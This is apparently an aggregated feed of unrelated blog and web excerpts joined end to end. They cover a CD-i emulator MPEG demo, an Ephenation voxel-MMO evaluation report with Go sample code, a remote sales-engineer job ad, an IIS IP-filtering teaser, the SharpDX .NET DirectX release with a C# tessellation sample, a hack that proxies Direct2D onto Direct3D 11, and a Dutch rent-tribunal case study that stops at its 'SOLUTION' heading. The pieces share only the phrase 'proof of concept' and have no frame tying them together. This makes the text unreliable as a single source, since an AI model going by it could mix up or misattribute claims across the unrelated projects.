Lucky Luke on YouTube        
I have just posted a "proof of concept" demonstration of CD-i Emulator MPEG decoding on YouTube:



The Philips Media bumper animation is MPEG (audio and video) and so is the audio for the piano sequence. The in-game crash is due to an MPEG sound effect.

This is with a Gate Array MPEG AH01 cartridge (22ER9141 F1 AH01); as the cartridge types get newer, the decoding works less and less well. Later GMPEG cartridges will crash earlier in the gameplay, and VMPEG and IMPEG cartridges will not play MPEG at all. This is simply because I haven't gotten around to fixing those things yet; there are still major bugs in the buffering of the MPEG data, and until those are fixed there is no point.

The magenta border indicates "beta" quality; it would not be hard to display the proper border color (black in this case), but this serves as a reminder that it is a work in progress.

Many other DVC titles will play their Philips bumper but crash soon thereafter; some others won't even get that far. In some cases this is not even due to MPEG decoding issues but to various "other" reasons for crashing (The 7th Guest is a notorious example).

I have also put up a new draft of the upcoming version 0.5.3-beta1 Release Notes on the website.
          Ephenation evaluation report        

Vision of Ephenation

To have a game like World Of Warcraft, where players are able to add their own adventures. I think this is a probable future development, and this type of game should be fully realized and generally available in something like 10 to 20 years.

Goals

Unlimited world

The size of the world should not be limited. It is easier to implement a flat world than a spherical world, and a flat world can be unlimited. The natural landscape will obviously have to be generated automatically.

Unlimited players

This is not possible, of course, but the number of simultaneous players should be large. A limit of 10 or 100 is much too small, as everyone would more or less know everyone and work on the same project. A minimum would be 1000 players, but preferably more than 10,000. That leads to a situation where you always meet new players you don't know, and the world is big enough that you can always find somewhere you have not explored.

Unlimited levels

Most RPG-type games have a limited set of levels, but that puts a limit on the game play. After reaching the top level, the game is no longer the same. Not only that, there is also a kind of race to reach the top level. Instead, there shall be no final top level. That puts an emphasis on constant exploration and progress.

Allocate territory

Players should be able to allocate a territory, where they can design their own adventures. This territory shall be protected from others, making sure no one else can interfere with the design.

Social support

The community and social interaction are very important. That is one reason for the requirement to support many players, as it allows you to include all your friends. There are a couple of ways to encourage community:
  1. Use of guilds. This would be a larger group of players, where you know the others.
  2. Temporary teams, used when exploring. It is more fun to explore with others.
  3. Use of common territories. It shall be possible to cooperate with friends to make territories that are related and possibly adjacent to each other.

Mechanics

It shall be possible to design interesting buildings, landscapes and adventures. The adventures shall be advanced enough to support triggered actions, with dynamic behavior that depends on player choices.

Execution

This is a description of how the project was executed. It was started at the end of 2010. Most of the programming was done by me (Lars Pensjö), but I had support with several submodules.

Server

It was decided to use Go as the programming language for the server. Go has just the right support for this type of software:
  1. High performance (compiled language)
  2. Object orientation and static typing
  3. The concept of goroutines (a lightweight version of threads)
  4. A very high rate of "it works when it compiles"
  5. Garbage collection
The disadvantage of Go when the Ephenation project started was that it was a new language, still in transition, with an uncertain future. This turned out not to be a problem, and the language now has a frozen specification (Go 1).

To be able to manage the massive number of players, quadtrees are used for both players and monsters.
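The real server code is more involved, but the principle can be shown with a minimal Go sketch (illustrative only, all names made up; the actual implementation also has to handle removal and movement): each node covers a square of the world and splits when it gets crowded, so a "who is near this position?" query only visits a few nodes instead of scanning all 10,000+ entities.

package main

import "fmt"

// Entity is anything with a position, e.g. a player or a monster.
type Entity struct {
    Name string
    X, Y float64
}

// Quadtree covers the square from (X, Y) to (X+Size, Y+Size).
type Quadtree struct {
    X, Y, Size float64
    Entities   []*Entity
    Children   []*Quadtree // nil until the node has been split
}

const maxPerNode = 2 // kept tiny so the example below actually splits

func (q *Quadtree) contains(e *Entity) bool {
    return e.X >= q.X && e.X < q.X+q.Size && e.Y >= q.Y && e.Y < q.Y+q.Size
}

// Insert adds an entity, splitting the node when it gets too crowded.
func (q *Quadtree) Insert(e *Entity) {
    if q.Children == nil {
        q.Entities = append(q.Entities, e)
        if len(q.Entities) > maxPerNode {
            q.split()
        }
        return
    }
    for _, c := range q.Children {
        if c.contains(e) {
            c.Insert(e)
            return
        }
    }
}

func (q *Quadtree) split() {
    h := q.Size / 2
    q.Children = []*Quadtree{
        {X: q.X, Y: q.Y, Size: h},
        {X: q.X + h, Y: q.Y, Size: h},
        {X: q.X, Y: q.Y + h, Size: h},
        {X: q.X + h, Y: q.Y + h, Size: h},
    }
    old := q.Entities
    q.Entities = nil
    for _, e := range old {
        q.Insert(e)
    }
}

// Nearby collects entities from every node that overlaps the square
// of the given radius around (x, y).
func (q *Quadtree) Nearby(x, y, radius float64, out []*Entity) []*Entity {
    if x+radius < q.X || x-radius >= q.X+q.Size ||
        y+radius < q.Y || y-radius >= q.Y+q.Size {
        return out // the query square does not touch this node
    }
    out = append(out, q.Entities...)
    for _, c := range q.Children {
        out = c.Nearby(x, y, radius, out)
    }
    return out
}

func main() {
    world := &Quadtree{Size: 1024}
    world.Insert(&Entity{"player1", 100, 200})
    world.Insert(&Entity{"monster1", 110, 190})
    world.Insert(&Entity{"player2", 900, 900})
    near := world.Nearby(100, 200, 50, nil)
    fmt.Println(len(near)) // prints 2: player2 sits in a far-away node and is never visited
}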

It is the server that has full control over all model data: player attributes, melee mechanics, movement, etc.

Client

The client was initially designed in C, but I soon switched to C++. There are still some remnants of C, which explains some not-so-good OO solutions. OpenGL was selected instead of DirectX, partly as a random choice, but also because I wanted to do the development in Linux.

It was decided to use OpenGL 3.3 instead of supporting older variants. There are some nice improvements in OpenGL that make design easier, which was deemed more important than supporting old hardware.

The world consists of blocks, i.e. voxels. This is difficult to draw in real time at a high FPS, as the number of faces grows very quickly with viewing distance. Considerable effort was spent on transforming the list of cubes into a list of visible triangles. It is also difficult to make a level of detail (LOD) algorithm that gradually reduces detail at long distances.
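The simplest part of that transformation can be illustrated with a small sketch (Go for brevity, not the actual C++ client code): a cube face only needs triangles when the neighbouring voxel is air, which already removes the vast majority of faces in a solid landscape.

package main

import "fmt"

const chunkSize = 16

// Chunk is a block of voxels; 0 means air, anything else is solid.
type Chunk [chunkSize][chunkSize][chunkSize]byte

func (c *Chunk) solid(x, y, z int) bool {
    if x < 0 || y < 0 || z < 0 || x >= chunkSize || y >= chunkSize || z >= chunkSize {
        return false // treat everything outside the chunk as air
    }
    return c[x][y][z] != 0
}

// VisibleFaces counts the cube faces that actually need triangles:
// only faces where a solid block touches air are kept.
func (c *Chunk) VisibleFaces() int {
    dirs := [6][3]int{{1, 0, 0}, {-1, 0, 0}, {0, 1, 0}, {0, -1, 0}, {0, 0, 1}, {0, 0, -1}}
    count := 0
    for x := 0; x < chunkSize; x++ {
        for y := 0; y < chunkSize; y++ {
            for z := 0; z < chunkSize; z++ {
                if !c.solid(x, y, z) {
                    continue
                }
                for _, d := range dirs {
                    if !c.solid(x+d[0], y+d[1], z+d[2]) {
                        count++ // this face borders air, so it must be drawn
                    }
                }
            }
        }
    }
    return count
}

func main() {
    var c Chunk
    for x := 0; x < chunkSize; x++ {
        for y := 0; y < 8; y++ { // fill the lower half of the chunk
            for z := 0; z < chunkSize; z++ {
                c[x][y][z] = 1
            }
        }
    }
    blind := 16 * 8 * 16 * 6                   // faces if every cube were drawn
    fmt.Println(c.VisibleFaces(), "of", blind) // prints "1024 of 12288"
}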

Another technical difficulty with a world based on cubes was making it look nice instead of blocky. Some algorithms that used a kind of filter were investigated. As the view distance is limited, there can be a conflict when the player is underground.

The game engine can't know whether the far distance, which is not visible, should be replaced by a light background (from the sky) or by a dark background (typical when underground). A compromise is used, where the color of the distance fog depends on the player's height.
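In code, the compromise amounts to a simple blend based only on the player's height. The sketch below is illustrative Go (the real client is C++), with made-up colors and thresholds.

package main

import "fmt"

// fogColor blends between a dark "cave" fog and a bright "sky" fog,
// based only on the player's height. The thresholds and colors are
// invented for this example.
func fogColor(playerHeight float64) (r, g, b float64) {
    const undergroundLevel = -10.0 // below this: fully dark fog
    const surfaceLevel = 0.0       // above this: fully sky-coloured fog
    t := (playerHeight - undergroundLevel) / (surfaceLevel - undergroundLevel)
    if t < 0 {
        t = 0
    } else if t > 1 {
        t = 1
    }
    dark := [3]float64{0.05, 0.05, 0.08}
    sky := [3]float64{0.55, 0.75, 0.95}
    return dark[0] + t*(sky[0]-dark[0]),
        dark[1] + t*(sky[1]-dark[1]),
        dark[2] + t*(sky[2]-dark[2])
}

func main() {
    fmt.Println(fogColor(5))   // on the surface: sky-coloured fog
    fmt.Println(fogColor(-50)) // deep underground: dark fog
}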

Protocol

There are strict requirements on the protocol. If a server shall be able to handle 10,000+ players, the communication can easily become a bottleneck. TCP/IP was selected over UDP/IP to make it easier to handle traffic control. The protocol itself is not based on any standard and is completely customized for Ephenation.
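Since the actual wire format is internal to Ephenation, the sketch below only illustrates the kind of framing that any custom protocol on top of TCP needs: TCP delivers a byte stream, not discrete messages, so each message is prefixed with its length. The 2-byte length plus 1-byte type header here is an assumption for the example, not the real format.

package main

import (
    "bytes"
    "encoding/binary"
    "fmt"
    "io"
)

// writeMessage frames one message as: 2-byte length, 1-byte type, payload.
// This format is only an illustration, not the actual Ephenation protocol.
func writeMessage(w io.Writer, msgType byte, payload []byte) error {
    header := make([]byte, 3)
    binary.BigEndian.PutUint16(header, uint16(len(payload)+1))
    header[2] = msgType
    if _, err := w.Write(header); err != nil {
        return err
    }
    _, err := w.Write(payload)
    return err
}

// readMessage reads exactly one framed message back from the stream.
func readMessage(r io.Reader) (msgType byte, payload []byte, err error) {
    header := make([]byte, 3)
    if _, err = io.ReadFull(r, header); err != nil {
        return
    }
    length := binary.BigEndian.Uint16(header)
    payload = make([]byte, length-1)
    _, err = io.ReadFull(r, payload)
    return header[2], payload, err
}

func main() {
    var conn bytes.Buffer // stands in for a TCP connection
    writeMessage(&conn, 42, []byte("player moved"))
    t, p, _ := readMessage(&conn)
    fmt.Println(t, string(p)) // 42 player moved
}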

Mechanics

There are two major choices: either use a scripting language to control the aspects of the world, or use a graphical approach. A scripting language is more powerful, but on the other hand it is harder to learn. There is also the problem of supporting a massive number of players, in which case time-consuming scripts would make it unfeasible.

The choice was to go for a limited set of blocks, with a special block type that can be used to initiate predefined actions. Inspiration was taken from the principles of Lego blocks. With a relatively small set of basic blocks, it is possible to construct the most amazing things.

Evaluation

Game engine

The client side was designed from scratch, instead of using an existing game engine. This may have been a mistake, as the main development time was spent on graphical technology, instead of exploring the basic visions.

Adventure design and mechanics

The set of blocks and the possible actions with "activator blocks" are currently limited. They are not enough to construct full adventures that are fun to explore and provide great entertainment.
Early version of the game, where a player abused the monster spawner

Game play

The basic world is automatically generated. This usually makes a game of limited interest, as game play is bound to become repetitive. Support from the initial players enabled the creation of a world with many new buildings and creations. The more advanced features that support dynamic behavior were not added until later, which unfortunately led to most of the current world being too static.

Graphics

The graphics are working, but far from production level. There are several glitches, e.g. the camera falling inside walls and lighting effects being cut off. As the world is dynamic, the possibilities for offline precalculation are limited. That means most graphical effects have to be done live, which is a difficult requirement. For example, it is not known how many light sources it should be possible to manage. A deferred shader was chosen, which improves the decoupling between geometry and shading.
Early attempt to create automatic monsters. This was later replaced with fully animated models.

Social

The social side of the game play has only been explored to a very limited extent. There are ways to send messages to nearby players and to communicate privately with any player. Although this is a very important aspect of the final vision, it is known technology and not difficult to implement.

Performance tests

The aggressive requirement to support 10,000 simultaneous players is hard to verify. A simple simulator was used, adding 1000 players at random positions with a uniform density. These players simply walked around. If they were attacked, they attacked back. If they were killed, they automatically used the command to revive.

On a Core i7 with 8 GB of RAM, the load on the server was approximately 10%. This is no proof that the server can actually manage 10,000 players, as there may be non-linear dependencies. There are known bottlenecks, for example monster management, which is currently handled by a single thread. That means at most one core can be used for it, but it should be possible to distribute this task over several smaller goroutines, as sketched below.
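Something along these lines would be the natural Go approach (an illustrative sketch, not the actual server code): split the monster list into slices and let each goroutine update its own slice, so the scheduler can spread the work over all cores.

package main

import (
    "fmt"
    "sync"
)

type Monster struct {
    ID     int
    X, Y   float64
    Health int
}

// updateAll splits the monster list into numWorkers slices and updates
// each slice in its own goroutine, so the work can use several cores
// instead of a single thread. Each monster is owned by exactly one
// goroutine, so no locking is needed here.
func updateAll(monsters []*Monster, numWorkers int) {
    var wg sync.WaitGroup
    chunk := (len(monsters) + numWorkers - 1) / numWorkers
    for start := 0; start < len(monsters); start += chunk {
        end := start + chunk
        if end > len(monsters) {
            end = len(monsters)
        }
        wg.Add(1)
        go func(part []*Monster) {
            defer wg.Done()
            for _, m := range part {
                m.X += 0.1 // placeholder for the real AI/movement update
            }
        }(monsters[start:end])
    }
    wg.Wait()
}

func main() {
    monsters := make([]*Monster, 1000)
    for i := range monsters {
        monsters[i] = &Monster{ID: i}
    }
    updateAll(monsters, 8)
    fmt.Println("updated", len(monsters), "monsters")
}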

The communication was measured at around 100 MB/s. With linear scaling, that would be 1 GB/s for 10,000 players. The intention is that the scaling should be linear, as cross communication between players is designed to be of constant volume, but it remains to be proven.

There is the obvious question of whether the simulator is representative of real players. One way to improve that assessment would be to measure the actual behaviour of real players and compare it with the simulator.

Another possible bottleneck is the communication with the player database (MongoDB). This depends on the number of logins/logouts and auto saves, and also on the load generated by the web page; this has not been evaluated. Typically, an access takes about 1 ms. MongoDB is currently located on the same system as the game server, minimizing communication latency. For a full production server, the database will have to be managed by a separate computer system.

Equipment

The objects that the player can wear and wield are simplified. As the game concept is unlimited, it is not possible to hand-craft objects. Instead, there are 4 defined qualities for each object, per level.

Communication

TCP/IP has a higher overhead than UDP/IP. Some packets are big (complete chunks), which would have required several UDP/IP packets and complicated transmission control. It may be that UDP/IP should be used instead. However, this was not an issue for the evaluation of the project.

As the server is responsible for all object attributes, the clients need to be updated frequently. Player and monster positions are updated 10 times per second. This generates a fair amount of data, so the updates are limited to nearby players. Because of this, the client needs to interpolate positions to show smooth movement, and it needs to be able to handle stale information about other players and monsters. The advantage of having the server manage all attributes is that it is not possible to cheat; the client source code is available, and it would otherwise have been easy to make changes.
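The interpolation itself is simple; a minimal sketch (illustrative Go, the real client is C++) that blends between the two most recent server samples looks like this:

package main

import "fmt"

// Sample is one position update received from the server.
type Sample struct {
    Time float64 // seconds
    X, Y float64
}

// interpolate estimates where to draw an entity at render time 'now',
// given the two most recent server samples (10 per second in Ephenation).
func interpolate(prev, last Sample, now float64) (x, y float64) {
    if last.Time == prev.Time {
        return last.X, last.Y
    }
    t := (now - prev.Time) / (last.Time - prev.Time)
    if t < 0 {
        t = 0
    } else if t > 1 {
        t = 1 // stale data: hold the last known position rather than extrapolate
    }
    return prev.X + t*(last.X-prev.X), prev.Y + t*(last.Y-prev.Y)
}

func main() {
    prev := Sample{Time: 10.0, X: 0, Y: 0}
    last := Sample{Time: 10.1, X: 1, Y: 0}
    fmt.Println(interpolate(prev, last, 10.05)) // halfway between the samples: 0.5 0
}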

Conclusion

Moore's law

I believe computers will continue to grow exponentially more powerful for many years to come. However, the full power will probably not be accessible unless the game server can scale well with an increasing number of cores. The performance tests were done on hardware from 2011, and much more powerful equipment is already available.

Adventure design

As a proof of concept, I think the project was successful. The thing I miss most is a sufficiently powerful mechanism for custom adventures. This is a key point of the game concept, but I believe that, with more people involved, new ideas would emerge that would improve the possibilities considerably.

Document update history

2013-02-22 First published.
2013-02-24 Added discussion about using voxels on the client side.
2013-02-27 Information about entity attribute management and communication.
2015-05-04 Pictures failed, and were replaced.

          Remote Pre-Sales Systems Engineer in Oklahoma City        
A growing technology company is searching for a person to fill their position for a Remote Pre-Sales Systems Engineer in Oklahoma City. Candidates will be responsible for the following:
  • Using consultative selling to identify customer pain points associated with large virtual and cloud environments
  • Leading technical presentations in person and assisting sales directors with ROI presentations
  • Addressing any and all pre-sales technical questions related to the full Proof of Concept (POC) cycle
Qualifications for this position include:
  • Willingness to travel to visit customers and our headquarters as necessary
  • Extensive experience (5-7 years) in virtualization (VCP-DCV) and cloud computing architectures
  • 5-10 years in data center infrastructure or a related field in a sales engineering or consulting capacity
  • Strong affinity for customer relationship management and requirements gathering
  • Highly motivated, passionate team player, driven to thrive in an entrepreneurial, high-activity environment
  • All other requirements listed by the company
          Remote IP Filtering        
In the following post I would like to demonstrate how to enforce IP address filtering for a web role using simple security settings provided by the IIS web server. This post is just a proof of concept and should only be taken as a base for future work. For our discussion, let's consider that during production […]
          SharpDX, a new managed .Net DirectX API available        
If you have followed my previous work on a new .NET API for Direct3D 11, you know that I proposed this solution to the SlimDX team for the v2 of their framework, joined their team around one month ago, and was actively working to widen the coverage of the DirectX API. I have been able to extend the coverage to almost the whole API, and to develop Direct2D samples as well as XAudio2 and XAPO samples using it. But due to some incompatible directions that the SlimDX team wanted to follow, I have decided to also release my work under a separate project called SharpDX. Now, you may wonder why I'm releasing this new API as a separate project from SlimDX.

Well, I have been working really hard on this since the beginning of September, and I explained why in my previous post about Direct3D 11. I have checked in lots of code under the v2 branch of SlimDX, while having lots of discussions with the team (mostly Josh, who is mainly responsible for v2) on their devel mailing list. The reason I'm leaving the SlimDX team is that it was in fact not clear to me that I would not be part of the decisions for the v2 direction, although I was bringing a whole solution (by "whole", I mean a large proof of concept, not something robust and finished). At some point, Josh told me that Promit, Mike and himself, the co-founders of SlimDX, were the technical leaders of the project and would have the last word on the direction as well as on decisions about the v2 API.

Unfortunately, I was not expecting to work on such terms with them, considering that I had already built 100% of the engineering prototype for the next API. Over the last few days, we had lots of small technical discussions, but for some of them I clearly didn't agree with the decisions that were taken, whatever arguments I tried to give. This is a bit of a disappointment for me, but well, that's the life of open source projects. This is their project and they have other plans for it. So, I have decided to release the project on my own as SharpDX, although you will see that the code is currently exactly the same as the v2 branch of SlimDX (of course, because until yesterday I was working on the SlimDX v2 branch).

But things are going to change for both projects: SlimDX is taking the robust route (which I agree with), but with some decisions that I don't agree with (in terms of implementation and direction). And, as weird as it may sound, SharpDX is not intended to compete with SlimDX v2: they clearly have a different scope (supporting, for example, Direct3D 9, which I don't really care about), a different target, a different view on exposing the API, and SlimDX already has a large existing community. So SharpDX is primarily intended for my own work on demomaking, nothing more. I'm releasing it because SlimDX v2 is not going to be available soon, not even as an alpha version. On my side, I consider the current state of the SharpDX API usable (although far from as clean as it should be), and I'm going to use it myself while improving the generator and parser to make the code safer and more robust.

So, I did lots of work to bring new APIs into this system, including:
  • Direct3D 10
  • Direct3D 10.1
  • Direct3D 11
  • Direct2D 1
  • DirectWrite
  • DXGI
  • DXGI 1.1
  • D3DCompiler
  • DirectSound
  • XAudio2
  • XAPO
I have also been working on some nice samples, for example using Direct2D and Direct3D 10, including the use of the Direct2D tessellate API, in order to see how well it works compared to the gluTessellation methods that are most commonly used. You will find that the code to do such a thing is extremely simple in SharpDX:
using System;
using System.Drawing;
using SharpDX.Direct2D1;
using SharpDX.Samples;

namespace TessellateApp
{
    /// <summary>
    /// Direct2D1 Tessellate Demo.
    /// </summary>
    public class Program : Direct2D1DemoApp, TessellationSink
    {
        EllipseGeometry Ellipse { get; set; }
        PathGeometry TesselatedGeometry { get; set; }
        GeometrySink GeometrySink { get; set; }

        protected override void Initialize(DemoConfiguration demoConfiguration)
        {
            base.Initialize(demoConfiguration);

            // Create an ellipse
            Ellipse = new EllipseGeometry(Factory2D,
                new Ellipse(new PointF(demoConfiguration.Width/2, demoConfiguration.Height/2),
                    demoConfiguration.Width/2 - 100,
                    demoConfiguration.Height/2 - 100));

            // Populate a PathGeometry from Ellipse tessellation
            TesselatedGeometry = new PathGeometry(Factory2D);
            GeometrySink = TesselatedGeometry.Open();
            // Force RoundLineJoin, otherwise the tessellated output looks buggy at line joins
            GeometrySink.SetSegmentFlags(PathSegment.ForceRoundLineJoin);

            // Tessellate the ellipse to our TessellationSink
            Ellipse.Tessellate(1, this);

            // Close the GeometrySink
            GeometrySink.Close();
        }

        protected override void Draw(DemoTime time)
        {
            base.Draw(time);

            // Draw the tessellated geometry
            RenderTarget2D.DrawGeometry(TesselatedGeometry, SceneColorBrush, 1, null);
        }

        void TessellationSink.AddTriangles(Triangle[] triangles)
        {
            // Add tessellated triangles to the opened GeometrySink
            foreach (var triangle in triangles)
            {
                GeometrySink.BeginFigure(triangle.Point1, FigureBegin.Filled);
                GeometrySink.AddLine(triangle.Point2);
                GeometrySink.AddLine(triangle.Point3);
                GeometrySink.EndFigure(FigureEnd.Closed);
            }
        }

        void TessellationSink.Close()
        {
        }

        [STAThread]
        static void Main(string[] args)
        {
            Program program = new Program();
            program.Run(new DemoConfiguration("SharpDX Direct2D1 Tessellate Demo"));
        }
    }
}

This simple example produces the following output:


which is pretty cool considering the amount of code (although the Direct3D 10 and D2D initialization would add a bit more code). I found this to be much simpler than the gluTessellation API.

You will also find some other samples, like the XAudio2 ones, which generate a synthesized sound using reverb, and even some custom XAPO sound processors!

You can grab those samples from the SharpDX code repository (there is a SharpDXBinAndSamples.zip with a working solution containing all the samples I have been developing so far, along with the MiniTris sample from SlimDX).
          Hacking Direct2D to use directly Direct3D 11 instead of Direct3D 10.1 API        
Disclaimer about this hack: This hack was nothing more than a proof of concept and I *really* don't have time to dig into any kind of bugs related to it.

[Edit]13 Jan 2011: After Windows Update KB2454826, this hack stopped working. I have patched the sample to make it work again. Of course, you shouldn't consider this hack for any kind of production use. Use the standard DXGI shared sync keyed mutex instead. This hack is just for fun![/Edit]


If you know Direct3D 11 and Direct2D - they were released almost at the same time - you already know that there is a huge drawback to using Direct2D: it in fact only works with the Direct3D 10.1 API (although it works with older hardware thanks to the new feature level capability of the API).

From a developer's point of view, it is really disappointing that such a good API doesn't rely on the latest Direct3D API... especially when you know that the Direct3D 11 API is really close to the Direct3D 10.1 API... In the end, more work is required for a developer who would like to work with Direct3D 11, as it no longer has any text API, for example, meaning that in D3D11 you have to do it yourself. That isn't a huge task in itself if you go for an easy precalculated texture of fonts generated by some GDI+ calls or whatever, but still... it is annoying, especially when you need to display some information/FPS on the screen and can't wait to build a nice font-texture-based system...

I'm not being completely fair about Direct2D interoperability with Direct3D 11: there is in fact a well-known solution proposed by one guy from the DirectX team that involves using a DXGI mutex to synchronize a surface shared between D3D10.1 and D3D11. I was expecting this issue to be solved in some DirectX SDK release this year, but it seems that there is no plan to release an update for Direct2D in the near future (see my question in the comments and the answer...)... WP7 and XNA are probably getting much more attention here...

So last week I took some time to look at the Direct2D API and found that it's in fact fairly easy to hack Direct2D and redirect all the D3D10.1 API calls to a real Direct3D 11 instance... and this is pretty cool news! Here is the story of this little hack...


How does Direct2D access your already instantiated D3D10.1 device?


In order to use Direct2D with a renderable D3D10 texture2D, you need to query the IDXGISurface from your ID3D10Texture2D object, something like this:
IDXGISurface* surface;

// Create a Texture2D (or use SwapChain backbuffer)
d3d10Device->CreateTexture2D(&texture2DDesc, 0, &texture2D);

// Query the DXGI Surface associated with the D3D10.1 Texture2D
texture2D->QueryInterface(__uuidof(IDXGISurface), (void**)&surface);

// Create a D2D Render target from the D3D10 Texture2D through the associated DXGISurface
d2dFactory->CreateDxgiSurfaceRenderTarget(
surface,
&props,
&d2dRenderTarget
);
So starting from this CreateDxgiSurfaceRenderTarget call, Direct2D is somehow able to get back your D3D10.1 instance and use it to submit draw calls, create textures, etc. In order to find out how Direct2D gets an instance of ID3D10Device1, I first implemented a proxy IDXGISurface that was responsible for embedding the real DXGI surface and delegating all calls to it... while allowing me to track down how Direct2D gets back this ID3D10Device1:

  • After the surface is passed to CreateDxgiSurfaceRenderTarget, Direct2D queries the IDXGIDevice through the GetDevice method on the IDXGISurface
  • From the IDXGIDevice, Direct2D calls QueryInterface with the IID of the ID3D10Device interface (surprisingly, not ID3D10Device1)
And bingo! By giving your own implementation of ID3D10Device to Direct2D, you are able to redirect all the D3D10 calls to a Direct3D 11 device/context with a simple proxy implementing the ID3D10Device1 methods!

Interoperability between D3D10.1 and D3D11 API


Migrating from the D3D10/D3D10.1 API to D3D11 is quite straightforward and even has a dedicated paper on MSDN. For the purpose of this quick hack, I didn't implement proxies for the whole D3D10 API... instead I focused my work on how the D3D10 API is used from D2D and which of the methods/structures actually used are not binary compatible between D3D10 and D3D11.

In the end, I developed 5 proxies:
  • a Proxy for IDXGISurface interface, in order to hack the GetDevice method and return my own proxy for IDXGIDevice
  • a Proxy for IDXGIDevice interface in order to hack the QueryInterface method and return my own proxy for ID3D10Device1
  • a Proxy for the ID3D10Device1 interface
  • a Proxy for the ID3D10Texture2D interface
  • a Proxy for the ID3D10Buffer interface
For the ID3D10Device1 interface, most of the methods redirect the calls directly to the device (ID3D11Device) or context (ID3D11DeviceContext). I didn't bother to implement proxies for most of the parameters, because even if they are not always binary compatible, the returned objects are only used as references and are not called on directly. Take for example the proxy implementation for VSGetShader (which is used by Direct2D to save the D3D10 pipeline state):
virtual void STDMETHODCALLTYPE VSGetShader( 
    /* [annotation] */
    __out ID3D10VertexShader **ppVertexShader) {
    // Direct2D only uses the returned shader to restore it later via VSSetShader,
    // so an ID3D11VertexShader can be handed back directly without a wrapper.
    context->VSGetShader((ID3D11VertexShader**)ppVertexShader, 0, 0);
}

A real proxy would have to wrap the ID3D11VertexShader inside an ID3D10VertexShader proxy... but because Direct2D (and this is not a surprise) only uses VSGetShader to later call VSSetShader (in order to restore the saved state, or to set its own vertex/pixel shaders), it doesn't call any method on the ID3D10VertexShader instance... meaning that we can hand back an ID3D11VertexShader directly without performing any - costly - conversion.

In fact, most of the ID3D10Device1 proxy methods are like the previous one, a simple redirection to the D3D11 device or device context... easy!

I was only forced to implement custom proxies for some incompatible structures... or for returned object instances that are actually used by Direct2D (like ID3D10Buffer and ID3D10Texture2D).

For example, the ID3D10Device::CreateBuffer proxy method is implemented like this:

virtual HRESULT STDMETHODCALLTYPE CreateBuffer( 
    /* [annotation] */
    __in const D3D10_BUFFER_DESC *pDesc,
    /* [annotation] */
    __in_opt const D3D10_SUBRESOURCE_DATA *pInitialData,
    /* [annotation] */
    __out_opt ID3D10Buffer **ppBuffer) {
    D3D11_BUFFER_DESC desc11;

    // The common fields have the same layout, so copy them in one go
    *((D3D10_BUFFER_DESC*)&desc11) = *pDesc;
    // StructureByteStride field is new in D3D11
    desc11.StructureByteStride = 0;

    // Return our ID3D10Buffer proxy instead of the real one
    ProxyID3D10Buffer* buffer = new ProxyID3D10Buffer();
    buffer->device = this;
    *ppBuffer = buffer;
    HRESULT result = device()->CreateBuffer(&desc11, (D3D11_SUBRESOURCE_DATA*)pInitialData, (ID3D11Buffer**)&buffer->backend);

    CHECK_RETURN(result);

    return result;
}

There were also just a few problems with 2 incompatible structures, D3D10_VIEWPORT/D3D11_VIEWPORT (D3D11 uses floats instead of ints!) and D3D10_BLEND_DESC/D3D11_BLEND_DESC... but the proxy methods were easy to implement:

virtual void STDMETHODCALLTYPE RSSetViewports( 
    /* [annotation] */
    __in_range(0, D3D10_VIEWPORT_AND_SCISSORRECT_OBJECT_COUNT_PER_PIPELINE) UINT NumViewports,
    /* [annotation] */
    __in_ecount_opt(NumViewports) const D3D10_VIEWPORT *pViewports) {

    // Perform conversion between D3D10_VIEWPORT (ints) and D3D11_VIEWPORT (floats)
    D3D11_VIEWPORT viewports[16];
    for(UINT i = 0; i < NumViewports; i++) {
        viewports[i].TopLeftX = pViewports[i].TopLeftX;
        viewports[i].TopLeftY = pViewports[i].TopLeftY;
        viewports[i].Width = pViewports[i].Width;
        viewports[i].Height = pViewports[i].Height;
        viewports[i].MinDepth = pViewports[i].MinDepth;
        viewports[i].MaxDepth = pViewports[i].MaxDepth;
    }
    context->RSSetViewports(NumViewports, viewports);
}

Even though I haven't performed any timing measurements, the cost of those proxy methods should be almost unnoticeable... and probably much lighter than using mutex synchronization between the D3D10 and D3D11 devices!

Plug-in the proxies


In the end, I managed to put those proxies in a single .h/.cpp with an easy API to plug in the proxy. The call sequence before passing the DXGISurface to Direct2D then looks like this:

d3d11Device->CreateTexture2D(&offlineTextureDesc, 0, &texture2D);

// Create a Proxy DXGISurface from Texture2D compatible with Direct2D
IDXGISurface* surface = Code4kCreateD3D10CompatibleSurface(d3d11Device, d3d11DeviceContext, texture2D);

d2dFactory->CreateDxgiSurfaceRenderTarget(
surface,
&props,
&d2dRenderTarget
);

And that's all! You will find attached a project with the sources. Feel free to test it and let me know if you encounter any issues with it. Also, the code is far from 100% safe/robust... it's a quick hack. For example, I have not checked carefully that my proxies behave well with AddRef/Release... but that should be fine.

So far, it seems to work well with the whole Direct2D API... I have even been able to use DirectWrite with Direct2D... over Direct3D 11, without any problem. There is only one issue: PIX won't be able to debug Direct2D over Direct3D 11... because it seems that Direct2D performs some additional method calls (D3D10CreateStateBlocks) that are incompatible with the lightweight proxies I have developed... To be fully supported, it would be necessary to implement proxies for all the interfaces returned by ID3D10Device1... But this is such a laborious task that, by the time it was done, we could expect to have Direct2D fully working with Direct3D 11 from the DirectX team itself!

Also, from this little experience, I can safely say that it shouldn't take more than one day for one guy from the Direct2D team to patch the existing Direct2D code to use Direct3D 11... as it is much easier to do this on the original code than to go down the proxy road as I did! ;)



You can grab the VC++ 2010 project from here : D2D1ToD3D11.7z

This sample is only saving a "test.png" image using Direct2D API over Direct3D11.
          Dynamics CRM and SharePoint Server enable the Huurcommissie to optimize its processes
The Huurcommissie (the Dutch rent tribunal) provides general information about rent legislation and rent procedures, and issues rulings when tenant and landlord cannot work things out between themselves. There is a statutory time limit for handling disputes between tenant and landlord. However, the Huurcommissie had difficulty issuing rulings within that time limit. Dirk Goet, senior ICT advisor at the Huurcommissie, explains why. "The Huurcommissie has a relatively large number of employees, spread across the whole country and working from home. All these employees regularly need to consult case files for their work. Those used to be paper files, so we had to have them delivered to people's homes by courier and picked up again afterwards. All in all, a lot of time was lost that way. Because of the paper files, handling a dispute took seven to eight months on average. With a suitable automation system we wanted to bring that down to four to five months."

Until recently, the Huurcommissie was part of the Ministry of Housing. In 2010 the Huurcommissie became independent, and an IT project was started with the goal of setting up a new infrastructure and a new primary system. Dirk Goet: "The Huurcommissie wanted to make a major move towards digitisation: digitising the handling of case files, with a solution that is always available, independent of time and place. That requires a solid IT infrastructure on which we can impose high demands in terms of performance, availability, bandwidth and security."

SOLUTION

